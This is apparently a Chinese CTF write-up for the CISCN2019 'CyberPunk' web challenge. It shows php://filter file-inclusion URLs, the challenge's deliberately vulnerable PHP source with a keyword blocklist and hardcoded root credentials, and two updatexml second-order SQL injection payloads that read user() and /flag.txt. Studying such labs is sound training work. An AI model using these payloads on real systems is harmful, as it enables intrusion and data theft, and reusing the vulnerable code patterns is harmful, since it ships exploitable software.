[CISCN2019 华北赛区 Day1 Web5]CyberPunk

最新推荐文章于 2024-05-03 13:32:04 发布
最新推荐文章于 2024-05-03 13:32:04 发布
阅读量15 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/133061937
版权

知识点

  • 二次注入

查看源码,在最下面找到提示

看到file,联想到可以使用filter伪协议读取源码

?file=php://filter/convert.base64-encode/resource=index.php

?file=php://filter/convert.base64-encode/resource=delete.php

?file=php://filter/convert.base64-encode/resource=search.php

?file=php://filter/convert.base64-encode/resource=config.php

?file=php://filter/convert.base64-encode/resource=confirm.php

<?php
#index.php
ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

<?php
#delete.php
require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单删除成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}

<?php
#confirm.php
require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

<?php
#search.php
require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

<?php
#change.php
require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

<?php
#config.php
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

$DATABASE = array(

    "host" => "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);

confirm.php处使用了预处理语句,不好注入

注意到change.php,使用了 addslashes()函数,这里转义单引号等字符,但是入库的时候不会将转义符\入库,而取出数据时也没有过滤,造成二次注入。

$address = addslashes($_POST["address"]);
f (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }

payload

#查用户名
1' where user_id=updatexml(1,concat(0x7e,(select substr(user(),1,20)),0x7e),1)#

#查flag
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,20)),0x7e),1)#

操作步骤

  • 先在主页面随便输入
  • 在change页面的address处输入注入代码,提交
  • 再填写一次change的内容,提交,触发注入
  • 因为一次查不完flag,第二次输入注入代码前,要在delete页面把前面的删掉
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
末初的CSDN博客
03-26 2215
F12查看源码,发现存在传参 尝试通过伪协议文件包含读取源码: http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现除了index.php还存在这几个php文件:confirm.php,delete.ph...
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
This is the Cyberpunk Cheat table for the Cheat engine
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
重新记忆Web版:重新:记忆Web
02-06
回复:_记住网络版
augmented-ui:赛博朋克风格的Web UI变得容易。 得到增强
04-13
http : //augmented-ui.com/v1/test.html unpkg: https ://unpkg.com/augmented-ui@1/augmented.css 安装: $ npm install augmented-ui /node_modules/augmented-ui/augmented-ui.min.css $ npm install ...
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1177
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
php利用阿里云短信SDK实现短信发送功能
赛时科技
05-02 798
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
安卓获取SHA
qq_36237165的博客
04-30 440
1、电脑上来存在eclipse的用户或正在使用此开发工具的用户就简单了,直接利用eclipse 走打包流程,再打包的时候选择相应的签名,那么在当前面板的下面便会出现签名的相关信息。3)确保安装了jdk并且正确配置了环境变量, 在该目录下打开cmd,输入命令 :keytool -printcert -file CERT.RSA。1) 将apk解压(1.可以直接用解压工具直接解压,如果不行就修改后缀为 .rar文件后),下面解压后的文件。便会出现响应的签名的信息了,如下图。然后输入相关的签名口令 回车。
展开说说:Android Fragment完全解析-卷三
最新发布
Hidanchaofan的博客
05-03 638
本文章分析了Fragment的管理器FragmentManager、事务以及完整的声明周期和动态加载Fragment的原理解析。
翻译插件Translation和AndroidLocalize
qq_45649553的博客
04-28 442
翻译插件Translation和AndroidLocalize
动手写一个简单的Android 表格控件支持固定列
WeiPR的博客
04-30 691
自己动手写一个支持固定列、滚动的简单易用Android表格控件
XYCTF 2024 WP
m0_64016126的博客
04-28 1147
首先访问robots.txt有一个l0g1in.txt,访问即可得到账号和密码BP抓包进行一系列伪造即可第一层payload:?第二层payload:GET:?POST:a[]=1这里主要是通过数组绕过preg_match,然后构造preg_replace/e 漏洞通过fastcoll生成两个md5值一样的图片即可。
android layout 的文件夹可以创建子文件夹吗
xie__jin__cheng的博客
04-27 274
Android Studio中,你可以通过在layout文件夹下直接创建子文件夹的方式来实现。但需要注意的是,直接创建子文件夹后,Android可能无法识别这些子文件夹为资源文件夹。为了让Android能够识别这些子文件夹作为资源文件夹,你需要在项目的。android layout 的文件夹可以创建子文件夹吗?因为layout文件夹中的文件一多管理起来就很麻烦,如果可以分类管理起来就会轻松许多。通过以上步骤,你就可以在Android layout的文件夹中创建并使用子文件夹了。文件中进行相应的配置。
Android 振动和触感反馈功能失效问题分析
不要用过去的错误约束现在的自己。
04-28 409
如果Log中打印振动时常为20毫秒的话,亲测是没有任何振动触感的,所以我们延长振动的时间(单位为毫秒),具体的值要根据自己的需求来修改(本人项目最后修改的是80毫秒),当时我的项目只需要修改WAVEFORM_CLICK_EFFECT = 80即可生效。在Android13的项目中遇到这样一个问题,在设置 - 提示音和振动 - 振动和触感反馈 - 打开按触反馈,但是按键没有振动的效果(一般来说也就是三个导航按键的振动反馈)
Android 学习 鸿蒙HarmonyOS 4.0 第七章(TS中的类和对象,类继承)
qq_43670077的博客
04-30 337
Android 学习 鸿蒙HarmonyOS 4.0 第七章(TS中的类和对象,类继承)
android room 数据库升级的原则
solarsaber的专栏
04-28 340
room会自动生成 一个ProviderMeta.DB_VERSION 版本号的json文件 比如实例中升级到70 就会生成一个70.json的文件这是room自动生成创建表的。3.原有数据表如果是改变某个字段的名字 这时候需要复制老表的数据然后插入到新表 然后改变 databse版本号。在entities里增加新加的entity ProviderMeta.DB_VERSION 版本号增1。需要做的是 MIGRATION_68_69 写一个alertcolumn的sql exec。
Android OpenMAX(一)漫谈
青山渺渺
04-30 139
Android Media开发漫谈
用python的pillow写一个程序,将一个城市图片赛博朋克化
05-11
cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值